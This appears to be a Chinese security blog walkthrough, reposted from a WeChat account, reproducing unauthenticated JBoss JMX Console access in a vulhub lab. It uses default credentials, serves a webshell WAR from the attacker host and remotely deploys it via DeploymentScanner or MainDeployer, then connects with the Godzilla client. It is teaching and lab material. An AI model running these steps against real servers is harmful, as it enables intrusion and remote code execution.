低版本JMX Console未授权访问Getshell
漏洞描述
此漏洞主要是由于JBoss中/jmx-console/HtmlAdaptor路径对外开放,并且没有任何身份验证机制,导致攻击者 可以进⼊到 jmx控制台,并在其中执行任何功能。
漏洞影响范围
Jboss4.x以下
|
这里我们使用的复现环境是不存在的 , 所以需要密码
admin/admin |
然后找到 jboss.deployment(jboss 自带的部署功能)中的flavor=URL,type=DeploymentScanner点进去 (通过 url 的方式远程部署)
制作war包 , 这里用之前制作好的 shell.war , 然后用 python 开启web服务
python2 -m SimpleHTTPServer 80 |
填写war包远程地址
http://192.168.1.137/shell.war
高版本JMX Console未授权访问getshell
漏洞描述
JMX Console默认存在未授权访问,直接点击JBoss主页中的 JMX Console 链接进入JMX Console页面 ,通过 部署war包 , getshell。
漏洞描述
Jboss6.x以下
环境搭建
cd /pentest/vulhub/jboss/CVE-2017-12149 docker-compose up -d |
漏洞复现
http://192.168.1.137:8080/jmx-console/
这里使用的环境是CVE-2017-12149,所以需要输入密码
admin vulhub |
本地搭建部署点 在JMX Console页面点击jboss.system链接,在Jboss.system页面中点击service=MainDeployer
进入service=MainDeployer页面之后,找到methodIndex为17或19的deploy 填写远程war包地址进行 远程部署
kaili启动监听,并上传前面的shell.war到kali网址根目录
python2 -m SimpleHTTPServer 80 |
点击Invoke
下载成功
哥斯拉连接
原文始发于微信公众号(智检安全):JMX Console未授权访问
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论